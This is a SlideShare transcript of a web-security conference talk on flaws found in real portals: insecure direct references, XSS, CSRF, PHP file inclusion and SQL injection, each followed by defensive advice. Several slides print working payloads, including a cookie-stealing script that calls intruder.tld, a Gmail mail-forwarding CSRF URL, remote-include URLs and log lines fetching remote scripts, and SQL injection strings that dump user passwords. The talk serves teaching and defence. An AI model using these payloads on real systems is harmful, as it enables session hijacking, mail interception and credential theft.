SlideShare a Scribd company logo

Minor Mistakes In Web Portals

msobiegraj
msobiegraj

Michal Sobiegraj and Borys Lacki

Business
1 of 97
Minor Mistakes in Web Portals A Real Case Study ;-) Borys Łącki Michał Sobiegraj, CISSP
 Why is Web important? M
 Web is everywhere M
  We spend money  We manage our finances  We earn money  We waste our time M
 Internecie traffic http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf M
 2007: Web traffic has finally overtaken P2P M
 Web has beaten pr0n! YAY!* * not supported by any research M
 HTTP traffic breakdown http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf M
 Number of Internet hosts increases Over 60 mln active hosts (netcraft) M
 Web security in a nutshell M
 Web vulnerabilities make up nearly half of all discovered vulnerabilities in 2007 (Sans) M
 Why?  A really popular medium ($)  Immature technology  Logical errors  Home-made solutions M
 Phishing victims in the US 3.6 million of people lost $3.2 billion total (Gartner, http://www.heise-online.pl/news/item/2356/) M
 Standard Web application architecture Internet WWW layer (I/O filters) Application layer (business logic) Database server M
 Wrong! Internet WWW layer (I/O filters) New functionality Application layer (business logic) Database server M
Application Firewall vs. Proper  architecture, coding and SDLC Internet Web Application Firewall Warstwa WWW (filtry wejścia/wyjścia) New functionality Application layer (business logic) Database server M
 The right approach Internet Web Application Firewall WWW layer (I/O filters) Application layer New functionality (business logic) Database server M
 Most popular attacks  PHP Remote File Include  SQL Injection  Cross-Site Scripting  Cross-site Request Forgery (SANS Top-20 2007 Security Risks, 2007 Annual Update) M
 Information disclosure B
 A funny story ;-) B
 More pics hmm… B
 B
 :-D B
 Downloaded… B
 Connecting… B
 PWND ;-) B
 Conclusion? Staying secure requires specific mindset (Paranoia? ;-) B
 Client side access control  It’s possible to bypass the interface  Unlike in ATMs Does not work! B
 Client side access control  RSS feed name based on user ID server.tld/rss/100_rss.xml server.tld/rss/101_rss.xml server.tld/rss/102_rss.xml  Reading other user’s messages server.tld/index.php?p=ok&action=msgs2&msgs_id=80 server.tld/index.php?p=ok&action=msgs2&msgs_id=81 server.tld/index.php?p=ok&action=msgs2&msgs_id=82 B
 Solution: Server side access control B
 Cross-Site Scripting (XSS) B
 Reflective XSS Server http://server/index.php?id=<script>…</script> GET /index.php? id=<script>…</script> HTTP/1.1 Web Intruder Application User …<script>…</script>… exec(…) Data available in the context of the User B
 Example XSS code document.write(‘ <img src=„ http://intruder.tld/cookiemonster.gif? ’+escape(document.cookie) +’ ”> ’); B
 Content alteration through an XSS attack B
 Rebranding through XSS http://server.tld/topics/%3Cscript%3Eeval(String.fromCharCode(100,111,99,117, 109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40, 34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,105,10 9,103,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,101,122,1 11,116,101,114,105,107,97,46,112,108,47,105,109,97,103,101,115,47,115,109,1 05,108,101,121,46,103,105,102,39,62,34));%3C%252fscript%3E document.getElementById(quot;logoquot;).innerHTML= quot;<img src='http://www.srv.tld/images/smiley.gif'>quot; M
 This is how it looks in the webpage code ... <div id=quot;maincontentquot;> <h2>Results for: <span style=quot;color: #f00;quot;><script>eval(String.fromCharCode(100,111,99,117,109,101 ,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,1 00,40,34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77 ,76,61,34,60,105,109,103,32,115,114,99,61,39,104,116,116,112,5 8,47,47,119,119,119,46,101,122,111,116,101,114,105,107,97,46,1 12,108,47,105,109,97,103,101,115,47,115,109,105,108,101,121,4 6,103,105,102,39,62,34));</script></span></h2> </div> ... M
 The code that is to be changed <div id=quot;logoquot;> <div class=quot;logolinkquot;> <a href=quot;http://server.tld/quot;>server.tld</a> </div> ... </div> M
 The code in a Web browser M
 Final outcome M
 Rendered in a browser M
 Content change using XSS  Is not permanent  Better code  easier (sic!) An idea: A form that looks just like a legitimate one, but sends input data elsewhere  phishing B
 Authentication using cookies POST /login.php HTTP/1.1 login=user&password=asd12ed]r3 HTTP/1.1 OK 200 Set-cookie: user_id=734223s8uod42 Welcome user User GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Server Welcome user B
 Impersonating a legitimate user POST /login.php HTTP/1.1 login=user&password=asd12ed]r3 HTTP/1.1 OK 200 Set-cookie: user_id=734223s8uod42 Welcome user User GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Server Welcome user GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Intruder Welcome user B
 Session cookie hijacking http://www.server.tld/index.php?p=comm ents&comments_login=smietanka%3Cscri pt%3Edocument.write(document.cookie) %3C/script%3E PHPSESSID=gji9h519llgbgbnaqg7si0q1l0; __utma=258102041.949163972.1198624259.1198624259.1198624259.1; __utmb=258102041; __utmc=258102041; __utmz=258102041.1198624259.1.1.utmccn=(direct)|utmcsr=(direct)|utmc md=(none) M
 M
 M
 M
 How to send yourself a cookie?  XMLHttpRequest Troublesome across domains  Link img, iframe, location.href, etc. Przykład: <img src=quot;http://server.tld/cookiemonster.gif?PHPSESSID%3Dgji9h519llgbgbnaqg7 si0q1l0%3B%20__utma%3D258102041.949163972.1198624259.1198624259. 1198624259.1%3B%20__utmb%3D258102041%3B%20__utmc%3D25810204 1%3B%20__utmz%3D258102041.1198624259.1.1.utmccn%3D%28direct%29 %7Cutmcsr%3D%28direct%29%7Cutmcmd%3D%28none%29quot;> B
 What can we do?  Tie a session ID with an IP address  Require re-authentication  Filter or sanitise input data !!! - White-listing (ScRipT) - Consistency (IDS, Firewall, App) - In-depth (....//  ../), UTF-7 B
 http://server.tld/topics/<img src=http://www.serv.tld/images/smiley.gif> / M
http://server.tld/topics/<img  src=http:%2f%2fwww.serv.tld%2fimages%2fsmiley.gif> %2f  / M
http://server.tld/topics/<img  src=http:%252f%252fwww.serv.tld%252fimages%252fsmile y.gif> %252f  %2f  / M
 B
 Stored XSS Server POST /register.php HTTP/1.1 login=<script>…</script>&password=asd Web Application GET /index.php HTTP/1.1 <script>…</script> User …<script>…</script>… Intruder exec(…) Database Data available in the context of the User B
 Stored XSS Exploitation?  Permanent content alteration  Easy session ID hijack  CSRF  XSS Proxy  Automated worms - mySpace, Orkut, Nduja, Borys Easy ;] in web portals that allow users to publish their own content: - bidding portals, blogs, web fora, etc B
 Session ID hijack B
 XSS Worm Web Server Stores the XSS-worm code in their profile Intruder XSS … Intruder User_1 User_2 B
 XSS Worm Web Server Stores the XSS-worm code in their profile GET /intruder/ HTTP/1.1 User_1 Intruder XSS …<script>…</script>… … exec(…) Stores the XSS-worm code in their profile Intruder User_1 XSS User_2 B
 XSS Worm Web Server Zapisuje XSS w swoim profilu GET /intruder/ HTTP/1.1 User_1 Intruder XSS …<script>…</script>… User_2 … Stores the XSS-worm exec(…) code in their profile Intruder GET /user1/ HTTP/1.1 User_1 XSS …<script>…</script>… Stores the XSS-worm exec(…) User_2 XSS code in their profile B
 Nduja – A Cross Domain/Webmail XSS Worm Intruder E-mail E-mail E-mail E-mail Web Web Web Web Server Server Server Server WebMail WebMail WebMail WebMail Libero.it Tiscali.it Lycos.it Excite.com B
 What can we do?  Tie a session ID with an IP address  Require re-authentication  Filter or sanitise input data !!! - White-listing (ScRipT) - Consistency (IDS, Firewall, App) - In-depth (.. ..//  ../), UTF-7  Filter or sanitise data stored in and read from a database B
 Cross-Site Request Forgery (CSRF) B
 CSRF Server http://server.tld/delete.php?id=34 Web Application GET /delete.php?id=34 HTTP/1.1 Cookie: user_id=734223s8uod42 … id = 34; Intruder delete(id); User … Item deleted! M
 Useful in getting to know your users a wee bit better… <img src=”http://nasza- klasa.pl/invite/1?i=1”> (/var/log/apache/fbi_cia_what-not_access.log) B
 Gmail message interception (CSRF) http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multip art/form-data&_action=https%3A//mail.google.com/mail/h/ wt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@maili nator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_atta ch=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter Everyone (well almost) has a Gmail account! (Domain hijack: www.davidairey.co.uk) B
 What can we do?  POST instead of GET  not very bullet-proof: iframe, javascript  Referrer  not very bullet-proof either: proxy, browsers, header alteration  Additional temporary ID  User ID tied to a long unpredictable key  ID-key association held on the server side  Re-authentication before sensitive operations  An vulnerability-free code!!! B
 PHP File Include B
 Local file include  Local file snoop (configs)  Arbitrary code execution (If file upload to the server is permitted)  Access to source code <?php if(file_exists(quot;includes/$page.incquot;)) { include quot;includes/$page.incquot;; } else { echo quot;In construction!<BR>quot;; } http://XXXXX.art.pl/p.php?page=../../../../../../../../../home/user1/publi c_html/.htpasswd%00 B
 Remote file include (Arbitrary code execution) <?php include($mosConfig_absolute_path.quot;/administrator/components /com_hashcash/config.hashcash.phpquot;); require_once ($mosConfig_absolute_path.'/components/com_hashcash/CryptoS trategy.php'); http://server.tld/components/com_hashcash/server.php?mosConfig_a bsolute_path=http://evil.tld/evil.txt? access_log:62.48.xxx.xx - - [06/Jan/2008:07:11:06 +0100] quot;GET //install/index.php?G_PATH=http://www.js2023.pl//modules/PNphpBB2/images/.bash/pr.t xt? HTTP/1.1quot; 404 1021 quot;-quot; quot;libwww-perl/5.803„ access_log:168.212.xxx.xxx - - [06/Jan/2008:22:57:53 +0100] quot;GET /files/strawberry/plugins/wacko/highlight/html.php?text=http://www.nakedarena.com/i d.txt? HTTP/1.1quot; 404 1021 quot;-quot; quot;libwww-perl/5.76quot; B
 What can we do?  Harden the application server (e.g. in PHP.ini) allow_url_fopen = Off allow_url_include = Off register_global = Off safe_mode = On register_globals = Off safe_mode_gid = Off display_errors = Off log_errors = On error_log = /var/log/httpd/php_error.log disable_functions = system, shell_exec, exec, passthru  Watch out for some special characters (null byte, etc)  Filter and sanitise (../, UTF, etc)  WAFs: mod_security, Suhosin PHP B
 SQL Injection M
 SQL Injection Server GET /login.php HTTP/1.1 login=admin&password=1’ or 1=‘1 Web Application Intruder select * from users where login=‘admin’ and pass=‘1’ or 1=‘1’ Welcome admin! $dane = db_exec(„select from users where Database login=‘$login’ and pass=‘$pass’”) if ($dane.count) { print („Welcome $login”) … } else { print („Bye”); exit (0); } M
POST http://www.server.tld/index.php?p=priv HTTP/1.1  priv_search=2e332424&cat='quot;1&w_city=quot;'asd&submit=Szukaj M
priv_search=&cat=1&w_city=Ca%B3a+Polska' and  1=1#&submit=Szukaj M
 priv_search=&cat=1&w_city=Ca%B3a+Polska' and 1=0#&submit=Szukaj M
 priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select @@version#&submit=Szukaj The used SELECT statements have a different number of columns M
 priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version#&submi t=Szukaj M
 priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16,17,18#&submi t=Szukaj M
priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select  1,2,3,TABLE_SCHEMA,5,6,7,8,9,10,TABLE_NAME,12,COLUMN_ NAME,14,15,16,17,18 from information_schema.columns where TABLE_SCHEMA != 'mysql' and TABLE_SCHEMA != 'information_schema'#&submit=Szukaj M
priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select  1,2,3,login,5,6,7,8,9,10,pass,12,sex,14,15,16,17,18 from users#&submit=Szukaj M
 Some S E C R E T S slip out ;-) 14831 users already registered (yeah, right ;-) M
Another discovery:  There is 1836 bots :-) M
 Blind SQL Injection Registration form: B ‘
 Blind SQL Injection (experimenting)  1' and 1='0  OK  1' or 1='1  This email is already registered. You need to pick another one  1' union all SELECT IF( user() like '%sig%', BENCHMARK(3000000,MD5( 'x' )),NULL)#  delay  user() == sig@...  1' union all SELECT IF( user() like '%asd%', BENCHMARK(3000000,MD5( 'x' )),NULL)#  no delay B
 Products 1-8 of 8 B
 Product database for selected category is empty B
 Blind SQL Injection • /zgoda.php?id=155765%20AND%20(select%2 0ascii(substring((select%20login%20from%20a dmini%20limit%201,1),1,1)))%3D97 • id=155765 AND (select ascii(substring((select login from admini limit LINIA,1), MIEJSCE, 1))) =ZNAK_ASCII B
 Results of a successful blind SQL Injection attack  Delay  Different content  Error message B
 What can we do?  Filter and sanitise input data - Characters white-listing - Consistency (IDS, Firewall, Application, Database)  Do not trust user-side filters (selection lists, JavaScript, etc) M
 Conclusion M
 Web application security is bad Vulnerability-causing mistakes are everywhere* *well, almost everywhere ;-) M
 What to do? Be sure to properly sanitise data coming from and being sent to the user  Web Application Firewall (WAF)  IDS White-listing! M
 Be aware of potential threats  Listenand ask  Use professional assistance  Perform a cost-benefit analysis every piece of feedback is worth listening M
 Use proven solutions • Traditional coding errors got answered by managed code, automatic typing, GC, etc. • Web frameworks help maintain code quality in Web Applications – Assure code quality to some degree – We are not 100% safe » Frameworks are not mature enough » Not everyone knows how to use them properly » Sometimes expanded in a dumb way » Wide exploitation due to mass usage M
 Hardening Proper configuration is a key! One application server configuration directive may prevent a vulnerability from being exploited PHP: http://www.sans.org/top20/#s1 M
 Think! No technical control will protect you from logical errors M
michal@sobiegraj.com b.lacki@logicaltrust.net Questions?

Recommended

ICEfaces and JSF 2.0 on GlassFish
ICEfaces and JSF 2.0 on GlassFishICEfaces and JSF 2.0 on GlassFish
ICEfaces and JSF 2.0 on GlassFishEduardo Pelegri-Llopart
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application DefenseFrank Kim
 
Anex....,,,.
Anex....,,,.Anex....,,,.
Anex....,,,.Carlos Catanejo
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
 
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...CODE BLUE
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
 
Denis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application securityDenis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application securityАліна Шепшелей
 

Recommended

ICEfaces and JSF 2.0 on GlassFish
ICEfaces and JSF 2.0 on GlassFishICEfaces and JSF 2.0 on GlassFish
ICEfaces and JSF 2.0 on GlassFishEduardo Pelegri-Llopart
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application DefenseFrank Kim
 
Anex....,,,.
Anex....,,,.Anex....,,,.
Anex....,,,.Carlos Catanejo
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
 
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...CODE BLUE
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
 
Denis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application securityDenis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application securityАліна Шепшелей
 
gofortution
gofortutiongofortution
gofortutiongofortution
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowAyoma Wijethunga
 
Bh europe-01-grossman
Bh europe-01-grossmanBh europe-01-grossman
Bh europe-01-grossmananiba2000
 
Citrix Internals: Tracing, Debugging & Troubleshooting
Citrix Internals: Tracing, Debugging & TroubleshootingCitrix Internals: Tracing, Debugging & Troubleshooting
Citrix Internals: Tracing, Debugging & TroubleshootingDenis Gundarev
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
 
Demystifying REST
Demystifying RESTDemystifying REST
Demystifying RESTKirsten Hunter
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Matt Johansen
 
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan KuskosCONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan KuskosPROIDEA
 
Enhancing Mobile User Experience with WebSocket
Enhancing Mobile User Experience with WebSocketEnhancing Mobile User Experience with WebSocket
Enhancing Mobile User Experience with WebSocketMauricio "Maltron" Leal
 
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008Association Paris-Web
 
SYN507: Reducing desktop infrastructure management overhead using “old school...
SYN507: Reducing desktop infrastructure management overhead using “old school...SYN507: Reducing desktop infrastructure management overhead using “old school...
SYN507: Reducing desktop infrastructure management overhead using “old school...Denis Gundarev
 
Front end-security
Front end-securityFront end-security
Front end-securityMiao Siyu
 
Xebia Knowledge Exchange - Owasp Top Ten
Xebia Knowledge Exchange - Owasp Top TenXebia Knowledge Exchange - Owasp Top Ten
Xebia Knowledge Exchange - Owasp Top TenPublicis Sapient Engineering
 
Secrets of Top Pentesters
Secrets of Top PentestersSecrets of Top Pentesters
Secrets of Top Pentestersamiable_indian
 
Webinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlWebinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlSeveralnines
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsrobertjd
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareOmer Meshar
 
[CB20] Pwning OT: Going in Through the Eyes by Ta-Lun Yen
[CB20] Pwning OT: Going in Through the Eyes by Ta-Lun Yen[CB20] Pwning OT: Going in Through the Eyes by Ta-Lun Yen
[CB20] Pwning OT: Going in Through the Eyes by Ta-Lun YenCODE BLUE
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
[convergese] Adaptive Images in Responsive Web Design
[convergese] Adaptive Images in Responsive Web Design[convergese] Adaptive Images in Responsive Web Design
[convergese] Adaptive Images in Responsive Web DesignChristopher Schmitt
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 

More Related Content

What's hot

Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowAyoma Wijethunga
 
Bh europe-01-grossman
Bh europe-01-grossmanBh europe-01-grossman
Bh europe-01-grossmananiba2000
 
Citrix Internals: Tracing, Debugging & Troubleshooting
Citrix Internals: Tracing, Debugging & TroubleshootingCitrix Internals: Tracing, Debugging & Troubleshooting
Citrix Internals: Tracing, Debugging & TroubleshootingDenis Gundarev
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Matt Johansen
 
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan KuskosCONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan KuskosPROIDEA
 
Enhancing Mobile User Experience with WebSocket
Enhancing Mobile User Experience with WebSocketEnhancing Mobile User Experience with WebSocket
Enhancing Mobile User Experience with WebSocketMauricio "Maltron" Leal
 
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008Association Paris-Web
 
SYN507: Reducing desktop infrastructure management overhead using “old school...
SYN507: Reducing desktop infrastructure management overhead using “old school...SYN507: Reducing desktop infrastructure management overhead using “old school...
SYN507: Reducing desktop infrastructure management overhead using “old school...Denis Gundarev
 
Front end-security
Front end-securityFront end-security
Front end-securityMiao Siyu
 
Secrets of Top Pentesters
Secrets of Top PentestersSecrets of Top Pentesters
Secrets of Top Pentestersamiable_indian
 
Webinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlWebinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlSeveralnines
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsrobertjd
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareOmer Meshar
 
[CB20] Pwning OT: Going in Through the Eyes by Ta-Lun Yen
[CB20] Pwning OT: Going in Through the Eyes by Ta-Lun Yen[CB20] Pwning OT: Going in Through the Eyes by Ta-Lun Yen
[CB20] Pwning OT: Going in Through the Eyes by Ta-Lun YenCODE BLUE
 

What's hot (19)

gofortution
gofortutiongofortution
gofortution
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must Know
 
Bh europe-01-grossman
Bh europe-01-grossmanBh europe-01-grossman
Bh europe-01-grossman
 
Citrix Internals: Tracing, Debugging & Troubleshooting
Citrix Internals: Tracing, Debugging & TroubleshootingCitrix Internals: Tracing, Debugging & Troubleshooting
Citrix Internals: Tracing, Debugging & Troubleshooting
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
 
Demystifying REST
Demystifying RESTDemystifying REST
Demystifying REST
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
 
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan KuskosCONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
 
Enhancing Mobile User Experience with WebSocket
Enhancing Mobile User Experience with WebSocketEnhancing Mobile User Experience with WebSocket
Enhancing Mobile User Experience with WebSocket
 
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
 
SYN507: Reducing desktop infrastructure management overhead using “old school...
SYN507: Reducing desktop infrastructure management overhead using “old school...SYN507: Reducing desktop infrastructure management overhead using “old school...
SYN507: Reducing desktop infrastructure management overhead using “old school...
 
Front end-security
Front end-securityFront end-security
Front end-security
 
Xebia Knowledge Exchange - Owasp Top Ten
Xebia Knowledge Exchange - Owasp Top TenXebia Knowledge Exchange - Owasp Top Ten
Xebia Knowledge Exchange - Owasp Top Ten
 
Secrets of Top Pentesters
Secrets of Top PentestersSecrets of Top Pentesters
Secrets of Top Pentesters
 
Webinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlWebinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControl
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malware
 
[CB20] Pwning OT: Going in Through the Eyes by Ta-Lun Yen
[CB20] Pwning OT: Going in Through the Eyes by Ta-Lun Yen[CB20] Pwning OT: Going in Through the Eyes by Ta-Lun Yen
[CB20] Pwning OT: Going in Through the Eyes by Ta-Lun Yen
 

Similar to Minor Mistakes In Web Portals

DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
[convergese] Adaptive Images in Responsive Web Design
[convergese] Adaptive Images in Responsive Web Design[convergese] Adaptive Images in Responsive Web Design
[convergese] Adaptive Images in Responsive Web DesignChristopher Schmitt
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdfssuser01066a
 
[refreshaustin] Adaptive Images in Responsive Web Design
[refreshaustin] Adaptive Images in Responsive Web Design[refreshaustin] Adaptive Images in Responsive Web Design
[refreshaustin] Adaptive Images in Responsive Web DesignChristopher Schmitt
 
[rwdsummit2012] Adaptive Images in Responsive Web Design
[rwdsummit2012] Adaptive Images in Responsive Web Design[rwdsummit2012] Adaptive Images in Responsive Web Design
[rwdsummit2012] Adaptive Images in Responsive Web DesignChristopher Schmitt
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysqqlan
 
[cssdevconf] Adaptive Images in RWD
[cssdevconf] Adaptive Images in RWD[cssdevconf] Adaptive Images in RWD
[cssdevconf] Adaptive Images in RWDChristopher Schmitt
 
[html5tx] Adaptive Images in Responsive Web Design
[html5tx] Adaptive Images in Responsive Web Design[html5tx] Adaptive Images in Responsive Web Design
[html5tx] Adaptive Images in Responsive Web DesignChristopher Schmitt
 
Analyzing the Performance of Mobile Web
Analyzing the Performance of Mobile WebAnalyzing the Performance of Mobile Web
Analyzing the Performance of Mobile WebAriya Hidayat
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php SecurityDave Ross
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sightRob Gillen
 
Application Security for RIAs
Application Security for RIAsApplication Security for RIAs
Application Security for RIAsjohnwilander
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionDaniel Owens
 
Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
